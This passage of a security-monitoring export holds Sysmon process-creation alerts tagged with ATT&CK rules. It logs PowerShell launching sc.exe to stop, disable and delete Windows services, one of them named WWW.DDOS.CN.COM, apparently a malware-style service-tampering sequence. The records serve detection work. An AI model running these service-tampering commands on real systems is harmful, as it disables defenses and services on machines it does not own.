12:52:37.477"",""processGuid"":""{df9fc3d3-b415-5ecf-0000-0010e5e23000}"",""processId"":""5272"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop AxInstSV"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:05.410",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:37.267 +ProcessGuid: {df9fc3d3-b415-5ecf-0000-00102adf3000} +ProcessId: 7360 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop clr_optimization +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop clr_optimization",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:37.273634700Z"",""eventRecordID"":""3890"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:37.267\r\nProcessGuid: {df9fc3d3-b415-5ecf-0000-00102adf3000}\r\nProcessId: 7360\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop clr_optimization\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:37.267"",""processGuid"":""{df9fc3d3-b415-5ecf-0000-00102adf3000}"",""processId"":""7360"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop clr_optimization"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:05.390",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:37.241 +ProcessGuid: {df9fc3d3-b415-5ecf-0000-00104ede3000} +ProcessId: 836 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config 
clr_optimization Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config clr_optimization Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:37.244090000Z"",""eventRecordID"":""3889"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:37.241\r\nProcessGuid: {df9fc3d3-b415-5ecf-0000-00104ede3000}\r\nProcessId: 836\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config clr_optimization Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:37.241"",""processGuid"":""{df9fc3d3-b415-5ecf-0000-00104ede3000}"",""processId"":""836"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config clr_optimization Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:05.360",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:37.189 +ProcessGuid: {df9fc3d3-b415-5ecf-0000-0010e7db3000} +ProcessId: 3252 +Image: C:\Windows\System32\sc.exe +FileVersion: 
10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop aspnet_staters +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop aspnet_staters",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:37.193937500Z"",""eventRecordID"":""3887"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:37.189\r\nProcessGuid: {df9fc3d3-b415-5ecf-0000-0010e7db3000}\r\nProcessId: 3252\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop aspnet_staters\r\nCurrentDirectory: C:\\Users\\John 
Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:37.189"",""processGuid"":""{df9fc3d3-b415-5ecf-0000-0010e7db3000}"",""processId"":""3252"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop aspnet_staters"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:05.313",8,"ATT&CK T1489: Stop Windows Service","""Process 
Create: +RuleName: +UtcTime: 2020-05-28 12:52:37.108 +ProcessGuid: {df9fc3d3-b415-5ecf-0000-0010bdd83000} +ProcessId: 3496 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHelpSvcs +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHelpSvcs",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:37.116134800Z"",""eventRecordID"":""3884"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:37.108\r\nProcessGuid: {df9fc3d3-b415-5ecf-0000-0010bdd83000}\r\nProcessId: 3496\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft 
Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHelpSvcs\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:37.108"",""processGuid"":""{df9fc3d3-b415-5ecf-0000-0010bdd83000}"",""processId"":""3496"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHelpSvcs"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:05.271",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:37.018 +ProcessGuid: {df9fc3d3-b415-5ecf-0000-001099d63000} +ProcessId: 4492 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete WWW.DDOS.CN.COM +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete 
WWW.DDOS.CN.COM",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:37.024243200Z"",""eventRecordID"":""3882"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:37.018\r\nProcessGuid: {df9fc3d3-b415-5ecf-0000-001099d63000}\r\nProcessId: 4492\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete WWW.DDOS.CN.COM\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:37.018"",""processGuid"":""{df9fc3d3-b415-5ecf-0000-001099d63000}"",""processId"":""4492"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete WWW.DDOS.CN.COM"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:05.255",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:36.976 +ProcessGuid: {df9fc3d3-b414-5ecf-0000-00105cd53000} +ProcessId: 7936 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WWW.DDOS.CN.COM +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WWW.DDOS.CN.COM",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:36.995095000Z"",""eventRecordID"":""3881"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:36.976\r\nProcessGuid: {df9fc3d3-b414-5ecf-0000-00105cd53000}\r\nProcessId: 7936\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WWW.DDOS.CN.COM\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:52:36.976"",""processGuid"":""{df9fc3d3-b414-5ecf-0000-00105cd53000}"",""processId"":""7936"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WWW.DDOS.CN.COM"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 